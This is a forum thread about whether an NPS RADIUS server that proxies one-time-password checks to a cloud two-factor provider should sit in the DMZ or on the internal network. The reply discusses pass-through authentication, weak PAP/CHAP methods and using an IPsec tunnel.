NPS on DMZ or internal network RRS feed

  • Question

  • Hi,

      We have the cloud based authentication service provider for two-factor authentication.  For VPN connectivity, client machine connects to the VPN gateway in corporate DMZ and VPN gateway contacts cloud authentication provider to verify the One time password. The VPN gateway to cloud happens on RADIUS over internet. Considering security issues in RADIUS, the plan is to have a RADIUS server hosted on-premise which in turn may connect to cloud for authentication. Should we have the NPS server installed in DMZ or internal network?  The NPS will not authenticate users against AD but connects to cloud provider to validate the OTP.  What is recommended in this case?  NPS (RADIUS server)  in DMZ or NPS in internal network?

    Wednesday, July 2, 2014 1:45 AM


  • Hi,

    I think what Alex is saying is that there can only be one authentication for each type of network access request. You indicated a two-factor authentication but what is actually happening is that the VPN server is a pass-thru aka proxy. No authentication is occurring there. You can add another pass-thru, with a second proxy RADIUS (VPN also runs RADIUS) but I don't think this will accomplish very much in terms of improved security. The authentication will still all occur in the cloud and the other RADIUS server will just be forwarding the authentication request the same as the VPN server. Please correct me if I'm mistaken, but if someone can access unencrypted network traffic on the VPN server, it doesn't matter if packets are being sent into your network or out to the cloud.

    It is quite common to place a pass-through/proxy VPN like this in the DMZ. If this VPN server must be accessible from the Internet, you can't place it anywhere else from a logical network perspective. Even though you might use PAT or NAT to physically place the server on your LAN, there will still be public access via the translated port address.

    I'm sure you know that you have chosen a less secure authentication method (PAP, CHAP) instead of something more secure like PEAP. Assuming you cannot change this, you might consider using an IPsec tunnel between the VPN server and the NPS/Cloud.

    I hope this helps,


    • Marked as answer by Alex Lv Thursday, August 7, 2014 10:24 AM
    Sunday, July 6, 2014 6:08 PM

All replies